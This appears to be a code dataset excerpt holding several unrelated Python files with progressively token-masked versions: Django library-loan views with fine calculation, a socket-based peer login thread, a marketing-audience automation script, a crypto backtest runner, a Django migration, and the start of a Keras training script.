actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n queryset = Borrower.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def get_serializer_class(self):\n if hasattr(self, 'action') and self.action == 'list':\n return BorrowerSerializer\n elif hasattr(self, 'action') and self.action == 'retrieve':\n return BorrowerDetailSerializer\n return BorrowerDetailSerializer\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass BorrowerViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n queryset = IssueSlip.objects.all()\n authentication_classes = TokenAuthentication,\n permission_classes = IsAdminUser,\n serializer_class = IssueSlipSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n issue_object = IssueSlip.objects.get(id=kwargs['pk'])\n book_object = Book.objects.get(id=issue_object.book_id)\n borrower_object = Borrower.objects.get(id=issue_object.borrower_id)\n book_object.is_available = True\n borrower_object.issue_count -= 1\n book_object.save()\n borrower_object.save()\n actual_return_date = datetime.now().replace(second=0, microsecond=0)\n if issue_object.due_date >= actual_return_date:\n request.data['actual_return_date'] = actual_return_date\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have no fine to pay'}, status=\n status.HTTP_200_OK)\n else:\n elapsed_time = actual_return_date - issue_object.due_date\n fine_amount = elapsed_time.seconds // 60\n request.data['actual_return_date'] = actual_return_date\n request.data['fine_amount'] = fine_amount\n self.update(request, *args, **kwargs)\n return Response({'msg': 'You have a fine to pay', 'fine':\n fine_amount}, status=status.HTTP_200_OK)\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n return Response({'msg': 'The Book has been issued'}, status=status.\n HTTP_201_CREATED)\n <function token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueSlipViewSet(viewsets.ModelViewSet):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n"
] | false |
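
The IssueSlip return flow in the record above charges one fine unit per minute past the due date (fine_amount = elapsed_time.seconds // 60). Below is a minimal standalone sketch of that rule; the per-minute rate is taken from the view, while switching to total_seconds() is my assumption so that returns more than a day late are not truncated the way timedelta.seconds would truncate them.

from datetime import datetime

def compute_fine(due_date: datetime, returned_at: datetime) -> int:
    # fine in the same per-minute units used by IssueSlipViewSet.partial_update
    if returned_at <= due_date:
        return 0  # returned on time, nothing to pay
    elapsed = returned_at - due_date
    # total_seconds() also counts whole days; timedelta.seconds alone wraps every 24 hours (assumed intent)
    return int(elapsed.total_seconds() // 60)

# quick check: 90 minutes late -> a fine of 90 units
assert compute_fine(datetime(2021, 1, 1, 12, 0), datetime(2021, 1, 1, 13, 30)) == 90
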
99,826 | 47ef00cb40d44d779ed8ce3ac88f9b2738a9438e | import socket
import sys
import Util
import threading as th
from dataBase import dataBase
from plot_net import plot_net
from matplotlib.pyplot import pause
class t_login(th.Thread):
def __init__(self,other_peersocket, packet):
th.Thread.__init__(self)
self.other_peersocket = other_peersocket
self.packet = packet
def run(self):
db = dataBase()
ip = self.packet[:55]
port = self.packet[55:]
sid = db.login(ip, port)
packet = "ALGI" + str(sid)
self.other_peersocket.send(packet.encode())
self.other_peersocket.close() | [
"import socket\nimport sys\nimport Util\nimport threading as th\nfrom dataBase import dataBase\nfrom plot_net import plot_net\nfrom matplotlib.pyplot import pause\n\nclass t_login(th.Thread):\n\tdef __init__(self,other_peersocket, packet):\n\t\tth.Thread.__init__(self)\n\t\tself.other_peersocket = other_peersocket\n\t\tself.packet = packet\n\n\tdef run(self):\n\t\tdb = dataBase()\n\n\t\tip = self.packet[:55]\n\t\tport = self.packet[55:]\n\t\t\n\t\tsid = db.login(ip, port)\n\n\t\tpacket = \"ALGI\" + str(sid)\n\t\tself.other_peersocket.send(packet.encode())\n\t\tself.other_peersocket.close()",
"import socket\nimport sys\nimport Util\nimport threading as th\nfrom dataBase import dataBase\nfrom plot_net import plot_net\nfrom matplotlib.pyplot import pause\n\n\nclass t_login(th.Thread):\n\n def __init__(self, other_peersocket, packet):\n th.Thread.__init__(self)\n self.other_peersocket = other_peersocket\n self.packet = packet\n\n def run(self):\n db = dataBase()\n ip = self.packet[:55]\n port = self.packet[55:]\n sid = db.login(ip, port)\n packet = 'ALGI' + str(sid)\n self.other_peersocket.send(packet.encode())\n self.other_peersocket.close()\n",
"<import token>\n\n\nclass t_login(th.Thread):\n\n def __init__(self, other_peersocket, packet):\n th.Thread.__init__(self)\n self.other_peersocket = other_peersocket\n self.packet = packet\n\n def run(self):\n db = dataBase()\n ip = self.packet[:55]\n port = self.packet[55:]\n sid = db.login(ip, port)\n packet = 'ALGI' + str(sid)\n self.other_peersocket.send(packet.encode())\n self.other_peersocket.close()\n",
"<import token>\n\n\nclass t_login(th.Thread):\n <function token>\n\n def run(self):\n db = dataBase()\n ip = self.packet[:55]\n port = self.packet[55:]\n sid = db.login(ip, port)\n packet = 'ALGI' + str(sid)\n self.other_peersocket.send(packet.encode())\n self.other_peersocket.close()\n",
"<import token>\n\n\nclass t_login(th.Thread):\n <function token>\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
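
Only the tracker-side handler is stored in this record, so the sketch below of a matching peer-side login call is an assumption throughout: the tracker address, the 4-byte 'LOGI' command prefix, and the padding of the IP field to 55 characters are inferred from the slicing (packet[:55] / packet[55:]) and from the 'ALGI' reply built above, not taken from any file shown here.

import socket

TRACKER_ADDR = ('localhost', 3000)  # assumed address; the record does not show where the tracker listens

def login(ip: str, port: str) -> str:
    # field widths mirror the handler: the first 55 characters carry the IP, the rest the port
    payload = 'LOGI' + ip.ljust(55) + port  # the 'LOGI' prefix is an assumption about the dispatcher protocol
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(TRACKER_ADDR)
    s.send(payload.encode())
    reply = s.recv(64).decode()  # expected shape: 'ALGI' + session id
    s.close()
    return reply[4:]

# session_id = login('172.16.1.1', '6000')  # left commented out: needs a running tracker
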
99,827 | 5e8bf23dcd7317545547604b98e78fe782be1311 | from ADB import set_pause, AutoDatabank
from ADB import t180, t365, somedays
from datetime import datetime, timedelta
set_pause(0.25,0.35)
xx = AutoDatabank(2, False, 'dp')
xx.brand_name = 'ASICS'
xx.zszw_order = 2
ts = '2018-10-20'
te = '2018-11-11'
tb = '2018-10-19'
def xinke_and_laoke_baoguang(people_type):
    if people_type == 'xinke':
        namess = '新客'  # label meaning "new customers"
        jbc = 3
    elif people_type == 'laoke':
        namess = '老客'  # label meaning "returning customers"
        jbc = 1
xx.cp()
    xx.qll(34, tb, tb)  # xx.zdy('历史老客YJA'), i.e. the historical returning-customer audience
xx.zszw([1, 99], ts, te, jbc)
xx.sp(namess + '--全部曝光')
for i in range(1, 9, 1):
xx.cp()
xx.qll(34, tb, tb)
xx.zszw([i, i], ts, te, jbc)
xx.zszw([1, 99], ts, te, 3)
xx.sp(namess + '--全部曝光X%s' % i)
def xinke_and_laoke_YJJ(people_type):
    if people_type == 'xinke':
        namess = '新客'  # label meaning "new customers"
        jbc = 3
    elif people_type == 'laoke':
        namess = '老客'  # label meaning "returning customers"
        jbc = 1
for i in range(1, 9, 1):
xx.cp()
        xx.qll(1, te, te)  # use audience A as the auxiliary audience
        xx.dp(5, ts, te, jbc=2)  # xx.zdy('活动期购买YJA', jbc=2), i.e. purchases during the campaign period
        xx.qll(34, tb, tb, jbc=1)  # xx.zdy('历史老客YJA', jbc=1), i.e. historical returning customers
xx.zszw([i, i], ts, te, jbc)
xx.sp(namess + '--曝光%s次' % i + '【G')
if __name__ == '__main__':
xinke_and_laoke_baoguang('xinke')
xinke_and_laoke_baoguang('laoke')
# xx.cp()
# xx.qll(1,'2019-1-20','2019-1-20')
# xx.sp('YJJ')
xinke_and_laoke_YJJ('xinke')
xinke_and_laoke_YJJ('laoke')
| [
"from ADB import set_pause, AutoDatabank\nfrom ADB import t180, t365, somedays\nfrom datetime import datetime, timedelta\n\nset_pause(0.25,0.35)\nxx = AutoDatabank(2, False, 'dp')\nxx.brand_name = 'ASICS'\nxx.zszw_order = 2\n\nts = '2018-10-20'\nte = '2018-11-11'\n\ntb = '2018-10-19'\n\n\ndef xinke_and_laoke_baoguang(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n\n xx.cp()\n xx.qll(34, tb, tb) # xx.zdy('历史老客YJA')\n xx.zszw([1, 99], ts, te, jbc)\n xx.sp(namess + '--全部曝光')\n\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([i, i], ts, te, jbc)\n xx.zszw([1, 99], ts, te, 3)\n xx.sp(namess + '--全部曝光X%s' % i)\n\n\ndef xinke_and_laoke_YJJ(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(1, te, te) # 以A人群作为辅助人群\n xx.dp(5, ts, te, jbc=2) # xx.zdy('活动期购买YJA', jbc=2)\n xx.qll(34, tb, tb, jbc=1) # xx.zdy('历史老客YJA', jbc=1)\n xx.zszw([i, i], ts, te, jbc)\n xx.sp(namess + '--曝光%s次' % i + '【G')\n\n\nif __name__ == '__main__':\n xinke_and_laoke_baoguang('xinke')\n xinke_and_laoke_baoguang('laoke')\n\n # xx.cp()\n # xx.qll(1,'2019-1-20','2019-1-20')\n # xx.sp('YJJ')\n\n xinke_and_laoke_YJJ('xinke')\n xinke_and_laoke_YJJ('laoke')\n",
"from ADB import set_pause, AutoDatabank\nfrom ADB import t180, t365, somedays\nfrom datetime import datetime, timedelta\nset_pause(0.25, 0.35)\nxx = AutoDatabank(2, False, 'dp')\nxx.brand_name = 'ASICS'\nxx.zszw_order = 2\nts = '2018-10-20'\nte = '2018-11-11'\ntb = '2018-10-19'\n\n\ndef xinke_and_laoke_baoguang(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([1, 99], ts, te, jbc)\n xx.sp(namess + '--全部曝光')\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([i, i], ts, te, jbc)\n xx.zszw([1, 99], ts, te, 3)\n xx.sp(namess + '--全部曝光X%s' % i)\n\n\ndef xinke_and_laoke_YJJ(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(1, te, te)\n xx.dp(5, ts, te, jbc=2)\n xx.qll(34, tb, tb, jbc=1)\n xx.zszw([i, i], ts, te, jbc)\n xx.sp(namess + '--曝光%s次' % i + '【G')\n\n\nif __name__ == '__main__':\n xinke_and_laoke_baoguang('xinke')\n xinke_and_laoke_baoguang('laoke')\n xinke_and_laoke_YJJ('xinke')\n xinke_and_laoke_YJJ('laoke')\n",
"<import token>\nset_pause(0.25, 0.35)\nxx = AutoDatabank(2, False, 'dp')\nxx.brand_name = 'ASICS'\nxx.zszw_order = 2\nts = '2018-10-20'\nte = '2018-11-11'\ntb = '2018-10-19'\n\n\ndef xinke_and_laoke_baoguang(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([1, 99], ts, te, jbc)\n xx.sp(namess + '--全部曝光')\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([i, i], ts, te, jbc)\n xx.zszw([1, 99], ts, te, 3)\n xx.sp(namess + '--全部曝光X%s' % i)\n\n\ndef xinke_and_laoke_YJJ(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(1, te, te)\n xx.dp(5, ts, te, jbc=2)\n xx.qll(34, tb, tb, jbc=1)\n xx.zszw([i, i], ts, te, jbc)\n xx.sp(namess + '--曝光%s次' % i + '【G')\n\n\nif __name__ == '__main__':\n xinke_and_laoke_baoguang('xinke')\n xinke_and_laoke_baoguang('laoke')\n xinke_and_laoke_YJJ('xinke')\n xinke_and_laoke_YJJ('laoke')\n",
"<import token>\nset_pause(0.25, 0.35)\n<assignment token>\n\n\ndef xinke_and_laoke_baoguang(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([1, 99], ts, te, jbc)\n xx.sp(namess + '--全部曝光')\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([i, i], ts, te, jbc)\n xx.zszw([1, 99], ts, te, 3)\n xx.sp(namess + '--全部曝光X%s' % i)\n\n\ndef xinke_and_laoke_YJJ(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(1, te, te)\n xx.dp(5, ts, te, jbc=2)\n xx.qll(34, tb, tb, jbc=1)\n xx.zszw([i, i], ts, te, jbc)\n xx.sp(namess + '--曝光%s次' % i + '【G')\n\n\nif __name__ == '__main__':\n xinke_and_laoke_baoguang('xinke')\n xinke_and_laoke_baoguang('laoke')\n xinke_and_laoke_YJJ('xinke')\n xinke_and_laoke_YJJ('laoke')\n",
"<import token>\n<code token>\n<assignment token>\n\n\ndef xinke_and_laoke_baoguang(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([1, 99], ts, te, jbc)\n xx.sp(namess + '--全部曝光')\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([i, i], ts, te, jbc)\n xx.zszw([1, 99], ts, te, 3)\n xx.sp(namess + '--全部曝光X%s' % i)\n\n\ndef xinke_and_laoke_YJJ(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(1, te, te)\n xx.dp(5, ts, te, jbc=2)\n xx.qll(34, tb, tb, jbc=1)\n xx.zszw([i, i], ts, te, jbc)\n xx.sp(namess + '--曝光%s次' % i + '【G')\n\n\n<code token>\n",
"<import token>\n<code token>\n<assignment token>\n\n\ndef xinke_and_laoke_baoguang(people_type):\n if people_type == 'xinke':\n namess = '新客'\n jbc = 3\n elif people_type == 'laoke':\n namess = '老客'\n jbc = 1\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([1, 99], ts, te, jbc)\n xx.sp(namess + '--全部曝光')\n for i in range(1, 9, 1):\n xx.cp()\n xx.qll(34, tb, tb)\n xx.zszw([i, i], ts, te, jbc)\n xx.zszw([1, 99], ts, te, 3)\n xx.sp(namess + '--全部曝光X%s' % i)\n\n\n<function token>\n<code token>\n",
"<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<code token>\n"
] | false |
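
Both functions in the record above start with the same people_type branching; a small optional refactor sketch follows. It only reuses names that already appear in the record (the labels, jbc values and the xx helpers) and changes no behaviour.

# mapping lifted from the repeated if/elif blocks: label and jbc per people_type
PEOPLE = {'xinke': ('新客', 3), 'laoke': ('老客', 1)}

def label_and_jbc(people_type):
    # raises KeyError immediately for an unknown type instead of failing later on an unbound name
    return PEOPLE[people_type]

# namess, jbc = label_and_jbc('xinke')
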
99,828 | 98bffef2a9fa1f7d8f13c3fca69e53641be21d6f | #from runner import trade_buySell_Binance
from backtest import back_test_buy, optimal_distribution_ma, optimal_distribution_dpo, optimal_distribution_vi
import pandas as pd
from binance_API import current_position, market_price_order, get_1min_ohlc_df_binance
from bitmex_API import current_postion_bitmex,bitmex_quote,market_price_order_bitmex
from runner import trade_buySell_Bitmex
from math import floor
#trade_buySell_Bitmex('XBTUSD', 'BTCUSDT', 297)
"""position = current_postion_bitmex('XBTUSD')
print(position)"""
#bitmex_quote("XBTUSD")
#current_postion_bitmex('XBTUSD')
#df = get_1min_ohlc_df_binance('BTCUSDT', 21)
#df.to_csv('Testdata.csv')
df = pd.read_csv('Testdata.csv')
back_test_buy(df)
#output = optimal_distribution_vi(df)
#print(output)
#back_test_buy(df)
"""df = pd.read_csv('BTCUSDT_1min_ohlc_data.csv')
print(df.head())
print(df.tail())
df = df.iloc[-600:]
print(df.size)
print(df.head())
print(df.tail())"""
"""df = get_1min_ohlc_df_binance('BTCUSDT', 1)
df['close'] = pd.to_numeric(df['close'])
df['high'] = pd.to_numeric(df['high'])
df['low'] = pd.to_numeric(df['low'])
df['open'] = pd.to_numeric(df['open'])
print(df.head())
print(df.tail())
back_test_buy(df)"""
#back_test_buy(df)
| [
"#from runner import trade_buySell_Binance\nfrom backtest import back_test_buy, optimal_distribution_ma, optimal_distribution_dpo, optimal_distribution_vi\nimport pandas as pd\nfrom binance_API import current_position, market_price_order, get_1min_ohlc_df_binance\nfrom bitmex_API import current_postion_bitmex,bitmex_quote,market_price_order_bitmex\nfrom runner import trade_buySell_Bitmex\nfrom math import floor\n\n#trade_buySell_Bitmex('XBTUSD', 'BTCUSDT', 297)\n\"\"\"position = current_postion_bitmex('XBTUSD')\nprint(position)\"\"\"\n#bitmex_quote(\"XBTUSD\")\n#current_postion_bitmex('XBTUSD')\n#df = get_1min_ohlc_df_binance('BTCUSDT', 21)\n#df.to_csv('Testdata.csv')\n\ndf = pd.read_csv('Testdata.csv')\nback_test_buy(df)\n\n#output = optimal_distribution_vi(df)\n#print(output)\n#back_test_buy(df)\n\n\n\n\n\n\"\"\"df = pd.read_csv('BTCUSDT_1min_ohlc_data.csv')\n\nprint(df.head())\nprint(df.tail())\ndf = df.iloc[-600:]\nprint(df.size)\nprint(df.head())\nprint(df.tail())\"\"\"\n\n\"\"\"df = get_1min_ohlc_df_binance('BTCUSDT', 1)\n\ndf['close'] = pd.to_numeric(df['close'])\ndf['high'] = pd.to_numeric(df['high'])\ndf['low'] = pd.to_numeric(df['low'])\ndf['open'] = pd.to_numeric(df['open'])\n\nprint(df.head())\nprint(df.tail())\n\nback_test_buy(df)\"\"\"\n\n#back_test_buy(df)venv\\\n",
"from backtest import back_test_buy, optimal_distribution_ma, optimal_distribution_dpo, optimal_distribution_vi\nimport pandas as pd\nfrom binance_API import current_position, market_price_order, get_1min_ohlc_df_binance\nfrom bitmex_API import current_postion_bitmex, bitmex_quote, market_price_order_bitmex\nfrom runner import trade_buySell_Bitmex\nfrom math import floor\n<docstring token>\ndf = pd.read_csv('Testdata.csv')\nback_test_buy(df)\n<docstring token>\n",
"<import token>\n<docstring token>\ndf = pd.read_csv('Testdata.csv')\nback_test_buy(df)\n<docstring token>\n",
"<import token>\n<docstring token>\n<assignment token>\nback_test_buy(df)\n<docstring token>\n",
"<import token>\n<docstring token>\n<assignment token>\n<code token>\n<docstring token>\n"
] | false |
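
The record above runs back_test_buy on a cached Testdata.csv, while the commented-out block sketches the live path. A compact version of that path is below; it assumes, as the commented code suggests, that get_1min_ohlc_df_binance returns string-typed OHLC columns that need the pd.to_numeric casts before backtesting.

import pandas as pd

def prepare_ohlc(df: pd.DataFrame) -> pd.DataFrame:
    # cast the OHLC columns to numeric before handing the frame to back_test_buy
    for col in ('open', 'high', 'low', 'close'):
        df[col] = pd.to_numeric(df[col])
    return df

# df = prepare_ohlc(get_1min_ohlc_df_binance('BTCUSDT', 1))  # live pull, commented out as in the record
# back_test_buy(df)
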
99,829 | 56ef650a73b8edbbd235d2b0bb343dd1de8a2519 | # Generated by Django 3.1.7 on 2021-03-19 08:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('inno_user', '0021_auto_20210318_1617'),
]
operations = [
migrations.AddField(
model_name='profile',
name='p_html',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='profile',
name='p_image',
field=models.ImageField(upload_to='inno_user/profile/'),
),
]
| [
"# Generated by Django 3.1.7 on 2021-03-19 08:17\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('inno_user', '0021_auto_20210318_1617'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='profile',\n name='p_html',\n field=models.BooleanField(default=False),\n ),\n migrations.AlterField(\n model_name='profile',\n name='p_image',\n field=models.ImageField(upload_to='inno_user/profile/'),\n ),\n ]\n",
"from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('inno_user', '0021_auto_20210318_1617')]\n operations = [migrations.AddField(model_name='profile', name='p_html',\n field=models.BooleanField(default=False)), migrations.AlterField(\n model_name='profile', name='p_image', field=models.ImageField(\n upload_to='inno_user/profile/'))]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('inno_user', '0021_auto_20210318_1617')]\n operations = [migrations.AddField(model_name='profile', name='p_html',\n field=models.BooleanField(default=False)), migrations.AlterField(\n model_name='profile', name='p_image', field=models.ImageField(\n upload_to='inno_user/profile/'))]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n <assignment token>\n <assignment token>\n",
"<import token>\n<class token>\n"
] | false |
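
For orientation, the model state this migration moves toward would look roughly like the sketch below. Only p_html and p_image are taken from the operations above; the class name Profile comes from model_name='profile', and any other fields of the model are not shown in the record, so they are omitted rather than guessed.

from django.db import models

class Profile(models.Model):
    # fields as implied by this migration's AddField / AlterField operations
    p_html = models.BooleanField(default=False)
    p_image = models.ImageField(upload_to='inno_user/profile/')
    # ...earlier inno_user migrations define the rest of the model, which is not reproduced here
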
99,830 | f058fb1be0fb2094485ff54ed5cd83723de341c6 | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import KFold, StratifiedKFold  # sklearn.cross_validation was removed in scikit-learn 0.20
from sklearn.linear_model import LogisticRegression
from keras.models import Sequential
from keras.layers import Dense,Activation,Dropout
from keras.callbacks import EarlyStopping
from keras.utils import to_categorical
from keras.metrics import binary_accuracy
import keras
import numpy as np
from sklearn.model_selection import train_test_split
import datetime
def training_vis(hist):
loss = hist.history['loss']
val_loss = hist.history['val_loss']
